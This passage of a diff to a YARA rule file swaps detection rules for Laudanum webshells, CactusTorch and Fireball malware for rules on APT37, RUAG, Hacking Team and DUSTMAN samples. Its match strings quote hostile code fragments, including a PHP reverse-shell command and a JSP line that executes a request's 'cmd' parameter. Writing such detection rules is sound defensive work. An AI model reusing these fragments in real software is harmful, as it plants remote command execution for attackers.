 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
-		$s2 = "printit(\"Successfully opened reverse shell to $ip:$port\");" fullword ascii
-		$s3 = "$input = fread($pipes[1], $chunk_size);" fullword ascii
+		$x1 = "Administrator(current):500:" ascii
 
 	condition:
-		filesize < 15KB and all of them
+		uint32be( 0 ) == 0x41646d69 and filesize < 3000 and $x1 at 0
 }
-rule SIGNATURE_BASE_Php_Dns : FILE
+rule SIGNATURE_BASE_SUSP_ZIP_Ntdsdit : T1003_003 FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file dns.php"
+		description = "Detects ntds.dit files in ZIP archives that could be a left over of administrative activity or traces of data exfiltration"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a52e453b-07aa-58b9-91e7-f2426a8e8976"
-		date = "2015-06-22"
+		id = "131ed73d-bb34-5ff6-b145-f95e4469d7f9"
+		date = "2020-08-10"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L175-L191"
+		reference = "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_dumps.yar#L47-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
-		logic_hash = "650eecc06f215ae6a15078c87d8a8c1597ca9e3d735eacd17b046a9d9deb6aa8"
-		score = 75
+		logic_hash = "371e30f50d96c884bd55ffc10d049d0ada881304746564a99dec0e8efad87602"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "T1003_003, FILE"
 
 	strings:
-		$s1 = "$query = isset($_POST['query']) ? $_POST['query'] : '';" fullword ascii
-		$s2 = "$result = dns_get_record($query, $types[$type], $authns, $addtl);" fullword ascii
-		$s3 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
-		$s4 = "foreach (array_keys($types) as $t) {" fullword ascii
+		$s1 = "ntds.dit" ascii
 
 	condition:
-		filesize < 15KB and all of them
+		uint16( 0 ) == 0x4b50 and $s1 in ( 0 .. 256 )
 }
-rule SIGNATURE_BASE_WEB_INF_Web : FILE
+rule SIGNATURE_BASE_APT_NK_Methodology_Artificial_Useragent_IE_Win7 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file web.xml"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8d0a008c-56d1-59ef-8521-0697add21ba9"
-		date = "2015-06-22"
+		description = "Detects hard-coded User-Agent string that has been present in several APT37 malware families."
+		author = "Steve Miller aka @stvemillertime"
+		id = "a747c908-7af7-5c29-8386-a71db7648061"
+		date = "2019-04-06"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L193-L207"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt37.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0251baed0a16c451f9d67dddce04a45dc26cb4a3"
-		logic_hash = "b58bb63a5268812ed6a5d18c8da96b0fdae33e4802a2fba4964ab69e92517a16"
-		score = 75
+		logic_hash = "43119b83a7eaf3dade9477d342b5656970940e9b4f41b3ba5f720d7fbe927762"
+		score = 45
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e63efbf8624a531bb435b7446dbbfc25"
 
 	strings:
-		$s1 = "<servlet-name>Command</servlet-name>" fullword ascii
-		$s2 = "<jsp-file>/cmd.jsp</jsp-file>" fullword ascii
+		$a1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
+		$a2 = {4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 20 57 4f 57 36 34 3b 20 54 72 69 64 65 6e 74 2f 37 2e 30 3b 20 72 76 3a 31 31 2e 30 29 20 6c 69 6b 65 20 47 65 63 6b 6f 00 00 00 00}
+		$fp1 = "Esumsoft" wide
+		$fp2 = "Acunetix" wide ascii
+		$fp3 = "TASER SYNC" ascii
 
 	condition:
-		filesize < 1KB and all of them
+		uint16( 0 ) == 0x5A4D and all of ( $a* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Jsp_Cmd : FILE
+rule SIGNATURE_BASE_RUAG_Tavdig_Malformed_Executable : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file cmd.war"
+		description = "Detects an embedded executable with a malformed header - known from Tavdig malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "74db62b8-82d5-5a34-aa72-2f85053715a4"
-		date = "2015-06-22"
+		id = "da6357d4-0cdb-5f30-9919-59858963cc41"
+		date = "2016-05-24"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L209-L226"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L9-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "55e4c3dc00cfab7ac16e7cfb53c11b0c01c16d3d"
-		logic_hash = "ab5b013a385549322bcb2811fa1a2d14b5633e2c41b9486b1e1c50c02437b8e6"
-		score = 75
+		logic_hash = "2a6eb90cc77f4556da0b5b0211bf0c4759dae0d78e9c6b765eff0e9a34f52e0f"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "cmd.jsp}" fullword ascii
-		$s1 = "cmd.jspPK" fullword ascii
-		$s2 = "WEB-INF/web.xml" fullword ascii
-		$s3 = "WEB-INF/web.xmlPK" fullword ascii
-		$s4 = "META-INF/MANIFEST.MF" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 2KB and all of them
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x0000AD0B
 }
-rule SIGNATURE_BASE_Laudanum : FILE
+rule SIGNATURE_BASE_RUAG_Bot_Config_File : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file laudanum.php"
+		description = "Detects a specific config file used by malware in RUAG APT case"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8c836aba-3644-5914-a3ff-937d0a6cd378"
-		date = "2015-06-22"
+		id = "aa3d5f9e-0b23-5180-9e52-a7d705712747"
+		date = "2016-05-24"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L228-L242"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L21-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
-		logic_hash = "53caad87d22b5f13e5b7be8720baa1d436cc57d8062ec5d557df8524a2ccfb68"
-		score = 75
+		logic_hash = "256808511233da446ec69db4f5a5e23a237296c100e79e78bbe5e4964fa5dde6"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "public function __activate()" fullword ascii
-		$s2 = "register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));" fullword ascii
+		$s1 = "[CONFIG]" ascii
+		$s2 = "name = " ascii
+		$s3 = "exe = cmd.exe" ascii
 
 	condition:
-		filesize < 5KB and all of them
+		uint32( 0 ) == 0x4e4f435b and $s1 at 0 and $s2 and $s3 and filesize < 160
 }
-rule SIGNATURE_BASE_Php_File : FILE
+rule SIGNATURE_BASE_RUAG_Cobra_Malware : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file file.php"
+		description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68456891-6828-5e42-b8a0-67ecaf83cdc0"
-		date = "2015-06-22"
+		id = "dd2d591f-6f56-5c31-9f3c-3aa7d174c9a0"
+		date = "2016-05-24"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L244-L260"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L36-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7421d33e8007c92c8642a36cba7351c7f95a4335"
-		logic_hash = "85c14a9c8a6aece231b1cb6dcdd7ed39fdc6aced868c34557ee2e2204ce7007b"
-		score = 75
+		logic_hash = "5576e8e465eb289e8da44009cb2237080c5b5c3eb6d7a337634d91c5d68ecd80"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$allowedIPs =" fullword ascii
-		$s2 = "<a href=\"<?php echo $_SERVER['PHP_SELF']  ?>\">Home</a><br/>" fullword ascii
-		$s3 = "$dir  = isset($_GET[\"dir\"])  ? $_GET[\"dir\"]  : \".\";" fullword ascii
-		$s4 = "$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";" fullword ascii
+		$s1 = "\\Cobra\\Release\\Cobra.pdb" ascii
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and $s1
 }
-rule SIGNATURE_BASE_Warfiles_Cmd : FILE
+rule SIGNATURE_BASE_RUAG_Cobra_Config_File : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file cmd.jsp"
+		description = "Detects a config text file used by malware Cobra in RUAG case"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f974255b-cfbe-57b0-af1f-eddb7f12f5ed"
-		date = "2015-06-22"
+		id = "b3899d95-acc9-55ca-9025-edecce755ca6"
+		date = "2016-05-24"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L262-L278"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L49-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3ae3d837e7b362de738cf7fad78eded0dccf601f"
-		logic_hash = "64724b24d9f5b5d78e231ea8196abb609237cc430c49f6ceeb99c9684a904568"
-		score = 75
+		logic_hash = "703a89562f3a2e5692883892f468288276459ad528cd371b1ac226e1d1c4be02"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));" fullword ascii
-		$s2 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword ascii
-		$s3 = "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">" fullword ascii
-		$s4 = "String disr = dis.readLine();" fullword ascii
+		$h1 = "[NAME]" ascii
+		$s1 = "object_id=" ascii
+		$s2 = "[TIME]" ascii fullword
+		$s3 = "lastconnect" ascii
+		$s4 = "[CW_LOCAL]" ascii fullword
+		$s5 = "system_pipe" ascii
+		$s6 = "user_pipe" ascii
+		$s7 = "[TRANSPORT]" ascii
+		$s8 = "run_task_system" ascii
+		$s9 = "[WORKDATA]" ascii
+		$s10 = "address1" ascii
 
 	condition:
-		filesize < 2KB and all of them
+		uint32( 0 ) == 0x4d414e5b and $h1 at 0 and 8 of ( $s* ) and filesize < 5KB
 }
-rule SIGNATURE_BASE_Asp_Dns : FILE
+rule SIGNATURE_BASE_RUAG_Exfil_Config_File : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file dns.asp"
+		description = "Detects a config text file used in data exfiltration in RUAG case"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0e30ca0-7163-5731-98c5-5a1893b8ea80"
-		date = "2015-06-22"
+		id = "7057bc7b-7f8c-5db8-b7f3-f6c33487b122"
+		date = "2016-05-24"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L280-L296"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L73-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5532154dd67800d33dace01103e9b2c4f3d01d51"
-		logic_hash = "808e879238a0c24e975c260fc95c05c91bdc0f73553a241bd00f5bf7e6622639"
-		score = 75
+		logic_hash = "379e8762932ca565f3bd35ec241aef2d0445fbe6182a041e4d4e16a1170202ef"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "command = \"nslookup -type=\" & qtype & \" \" & query " fullword ascii
-		$s2 = "Set objCmd = objWShell.Exec(command)" fullword ascii
-		$s3 = "Response.Write command & \"<br>\"" fullword ascii
-		$s4 = "<form name=\"dns\" method=\"POST\">" fullword ascii
+		$h1 = "[TRANSPORT]" ascii
+		$s1 = "system_pipe" ascii
+		$s2 = "spstatus" ascii
+		$s3 = "adaptable" ascii
+		$s4 = "post_frag" ascii
+		$s5 = "pfsgrowperiod" ascii
 
 	condition:
-		filesize < 21KB and all of them
+		uint32( 0 ) == 0x4152545b and $h1 at 0 and all of ( $s* ) and filesize < 1KB
 }
-rule SIGNATURE_BASE_Php_Reverse_Shell_2 : FILE
+rule SIGNATURE_BASE_Bin_Ndisk : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file php-reverse-shell.php"
+		description = "Hacking Team Disclosure Sample - file ndisk.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f10cc33e-0cb6-5d08-af1f-5ef76368de9d"
-		date = "2015-06-22"
+		id = "f442315e-67c2-55a5-954e-8e7e48aa1243"
+		date = "2015-07-07"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L298-L312"
+		reference = "https://www.virustotal.com/en/file/a03a6ed90b89945a992a8c69f716ec3c743fa1d958426f4c50378cca5bef0a01/analysis/1436184181/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hackingteam_rules.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "025db3c3473413064f0606d93d155c7eb5049c42"
-		logic_hash = "695dc565c273ed358f7d56526fa4956ba13b216d8897d0707e1660a82b745081"
-		score = 75
+		hash = "cf5089752ba51ae827971272a5b761a4ab0acd84"
+		logic_hash = "d93147e9631065eab35cbbc4ce112cfef92f81063cf8570bc021fbfe72811ab6"
+		score = 100
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
-		$s7 = "$shell = 'uname -a; w; id; /bin/sh -i';" fullword ascii
+		$s1 = "\\Registry\\Machine\\System\\ControlSet00%d\\services\\ndisk.sys" fullword wide
+		$s2 = "\\Registry\\Machine\\System\\ControlSet00%d\\Enum\\Root\\LEGACY_NDISK.SYS" fullword wide
+		$s3 = "\\Driver\\DeepFrz" wide
+		$s4 = "Microsoft Kernel Disk Manager" fullword wide
+		$s5 = "ndisk.sys" fullword wide
+		$s6 = "\\Device\\MSH4DEV1" wide
+		$s7 = "\\DosDevices\\MSH4DEV1" wide
+		$s8 = "built by: WinDDK" fullword wide
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 6 of them
 }
-rule SIGNATURE_BASE_Laudanum_Tools_Generic : FILE
+rule SIGNATURE_BASE_Hackingteam_Elevator_DLL : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools"
+		description = "Hacking Team Disclosure Sample - file elevator.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15738788-5f34-54d0-92fe-f7024c998a54"
-		date = "2015-06-22"
+		id = "d479c675-b200-56e3-8976-f70b45ea791e"
+		date = "2015-07-07"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L314-L345"
+		reference = "http://t.co/EG0qtVcKLh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hackingteam_rules.yar#L33-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "52c6d3be4fc91e8a61645886fa89bf78eddad51960702ff2ac83ec01d5d529ef"
-		score = 75
+		hash = "b7ec5d36ca702cc9690ac7279fd4fea28d8bd060"
+		logic_hash = "f2860c0bb6176f7cc57cb703e9d4235c4cf0b9cc1c0e7c47fb4c8ba47155a616"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
-		hash1 = "885e1783b07c73e7d47d3283be303c9719419b92"
-		hash2 = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
-		hash3 = "7421d33e8007c92c8642a36cba7351c7f95a4335"
-		hash4 = "f49291aef9165ee4904d2d8c3cf5a6515ca0794f"
-		hash5 = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
-		hash6 = "f32b9c2cc3a61fa326e9caebce28ef94a7a00c9a"
-		hash7 = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
-		hash8 = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
-		hash9 = "b50ae35fcf767466f6ca25984cc008b7629676b8"
-		hash10 = "5570d10244d90ef53b74e2ac287fc657e38200f0"
-		hash11 = "42bcb491a11b4703c125daf1747cf2a40a1b36f3"
-		hash12 = "83e4eaaa2cf6898d7f83ab80158b64b1d48096f4"
-		hash13 = "dec7ea322898690a7f91db9377f035ad7072b8d7"
-		hash14 = "a2272b8a4221c6cc373915f0cc555fe55d65ac4d"
-		hash15 = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
-		hash16 = "43320dc23fb2ed26b882512e7c0bfdc64e2c1849"
 
 	strings:
-		$s1 = "***  laudanum@secureideas.net" fullword ascii
-		$s2 = "*** Laudanum Project" fullword ascii
+		$s1 = "\\sysnative\\CI.dll" ascii
+		$s2 = "setx TOR_CONTROL_PASSWORD" fullword ascii
+		$s3 = "mitmproxy0" fullword ascii
+		$s4 = "\\insert_cert.exe" ascii
+		$s5 = "elevator.dll" fullword ascii
+		$s6 = "CRTDLL.DLL" fullword ascii
+		$s7 = "fail adding cert" fullword ascii
+		$s8 = "DownloadingFile" fullword ascii
+		$s9 = "fail adding cert: %s" fullword ascii
+		$s10 = "InternetOpenA fail" fullword ascii
 
 	condition:
-		filesize < 60KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 6 of them
 }
-rule SIGNATURE_BASE_CACTUSTORCH : FILE
+rule SIGNATURE_BASE_Hackingteam_Elevator_EXE : FILE
 {
 	meta:
-		description = "Detects CactusTorch Hacktool"
+		description = "Hacking Team Disclosure Sample - file elevator.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "75606b9e-97d5-5b8b-87f5-69b7e415b73c"
-		date = "2017-07-31"
+		id = "a68b68dd-372d-5572-a1e7-1b7e06e986d8"
+		date = "2015-07-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gen_cactustorch.yar#L11-L45"
+		reference = "Hacking Team Disclosure elevator.c"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hackingteam_rules.yar#L58-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "265287b27aa13840366dbb51ea58b2fdd10e0a57ff27d8deb52ff77dd71c26ad"
-		score = 75
-		quality = 85
+		hash = "9261693b67b6e379ad0e57598602712b8508998c0cb012ca23139212ae0009a1"
+		logic_hash = "58f3c28fa69da0329a4cd5451a86260056076a9d0094965e9c23a63ef72cfc98"
+		score = 70
+		quality = 81
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "314e6d7d863878b6dca46af165e7f08fedd42c054d7dc3828dc80b86a3a9b98c"
-		hash2 = "0305aa32d5f8484ca115bb4888880729af7f33ac99594ec1aa3c65644e544aea"
-		hash3 = "a52d802e34ac9d7d3539019d284b04ded3b8e197d5e3b38ed61f523c3d68baa7"
+		hash1 = "40a10420b9d49f87527bc0396b19ec29e55e9109e80b52456891243791671c1c"
+		hash2 = "92aec56a859679917dffa44bd4ffeb5a8b2ee2894c689abbbcbe07842ec56b8d"
 
 	strings:
-		$x1 = "$payload = shellcode(%options[\"listener\"], \"true\", \"x86\");" fullword ascii
-		$x2 = "Copy the base64 encoded payload into the code variable below." fullword ascii
-		$x3 = " CACTUSTORCH Payload" ascii
-		$x4 = "ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)" fullword ascii
-		$x5 = "' Author: Vincent Yiu (@vysecurity)" fullword ascii
-		$x6 = "Dim binary : binary = \"rundll32.exe\"" fullword ascii
-		$a1 = "code = code & \"" ascii
-		$a2 = "serialized_obj = serialized_obj & \"" ascii
-		$s1 = "binary = \"rundll32.exe\"" fullword ascii
-		$s2 = "EL.DataType = \"bin.hex\"" fullword ascii
-		$s3 = "Set stm = CreateObject(\"System.IO.MemoryStream\")" fullword ascii
-		$s4 = "var binary = \"rundll32.exe\";" fullword ascii
-		$s5 = "var serialized_obj = \"" ascii
+		$x1 = "CRTDLL.DLL" fullword ascii
+		$x2 = "\\sysnative\\CI.dll" ascii
+		$x3 = "\\SystemRoot\\system32\\CI.dll" ascii
+		$x4 = "C:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe" fullword ascii
+		$s1 = "[*] traversing processes" fullword ascii
+		$s2 = "_getkprocess" fullword ascii
+		$s3 = "[*] LoaderConfig %p" fullword ascii
+		$s4 = "loader.obj" fullword ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
+		$s6 = "[*] token restore" fullword ascii
+		$s7 = "elevator.obj" fullword ascii
+		$s8 = "_getexport" fullword ascii
 
 	condition:
-		( filesize < 800KB and ( 1 of ( $x* ) or ( 1 of ( $a* ) and 1 of ( $s* ) ) ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of ( $x* ) and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_Fireball_De_Svr : FILE
+rule SIGNATURE_BASE_MAL_ME_Rawdisk_Agent_Jan20_1 : FILE
 {
 	meta:
-		description = "Detects Fireball malware - file de_svr.exe"
+		description = "Detects suspicious malware using ElRawDisk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "29395239-66d8-5340-b884-9b8f036cc27f"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L12-L29"
+		id = "0efaae51-1407-5039-9e5a-9c2f13d6a971"
+		date = "2020-01-02"
+		modified = "2022-12-21"
+		reference = "Saudi National Cybersecurity Authority - Destructive Attack DUSTMAN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dustman.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ac858b3ce50daac811ded4664f2a602a32d8811825733d235125fc81a488e58"
-		score = 75
+		logic_hash = "90345b8358d72b6616c6277222fb1091cb3a88b844391ac3766e7d1ee1192fbe"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f964a4b95d5c518fd56f06044af39a146d84b801d9472e022de4c929a5b8fdcc"
+		hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
 
 	strings:
-		$s1 = "cmd.exe /c MD " fullword ascii
-		$s2 = "rundll32.exe \"%s\",%s" fullword wide
-		$s3 = "http://d12zpbetgs1pco.cloudfront.net/Weatherapi/shell" fullword wide
-		$s4 = "C:\\v3\\exe\\de_svr_inst.pdb" fullword ascii
-		$s5 = "Internet Connect Failed!" fullword ascii
+		$x1 = "\\drv\\agent.plain.pdb" ascii
+		$x2 = " ************** Down With Saudi Kingdom, Down With Bin Salman ************** " fullword ascii
+		$s1 = ".?AVERDError@@" fullword ascii
+		$s2 = "b4b615c28ccd059cf8ed1abf1c71fe03c0354522990af63adf3c911e2287a4b906d47d" fullword wide
+		$s3 = "\\\\?\\ElRawDisk" fullword wide
+		$s4 = "\\??\\c:" wide
+		$op1 = { e9 3d ff ff ff 33 c0 48 89 05 0d ff 00 00 48 8b }
+		$op2 = { 0f b6 0c 01 88 48 34 48 8b 8d a8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Fireball_Lancer : FILE
+rule SIGNATURE_BASE_MAL_ME_Rawdisk_Agent_Jan20_2 : FILE
 {
 	meta:
-		description = "Detects Fireball malware - file lancer.dll"
+		description = "Detects suspicious malware using ElRawDisk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2209bcb4-74a6-5c39-962c-ccd4ce62619e"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L31-L51"
+		id = "9817fb22-7bed-5869-aa92-66c458b81c7f"
+		date = "2020-01-02"
+		modified = "2022-12-21"
+		reference = "https://twitter.com/jfslowik/status/1212501454549741568?s=09"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dustman.yar#L26-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "74df144556121609da0820c319a86a9de0f49eeb2d4b1ed59c3a4d0c1d7788cb"
-		score = 75
+		logic_hash = "73e4a88b749e3b2654e9021290932d2e556c29cfa772785b23bebad9f3a3f90a"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7d68386554e514f38f98f24e8056c11c0a227602ed179d54ed08f2251dc9ea93"
+		hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
 
 	strings:
-		$x1 = "\\instlsp\\Release\\Lancer.pdb" ascii
-		$x2 = "lanceruse.dat" fullword wide
-		$s1 = "Lancer.dll" fullword ascii
-		$s2 = "RunDll32.exe \"" fullword wide
-		$s3 = "Micr.dll" fullword wide
-		$s4 = "AG64.dll" fullword wide
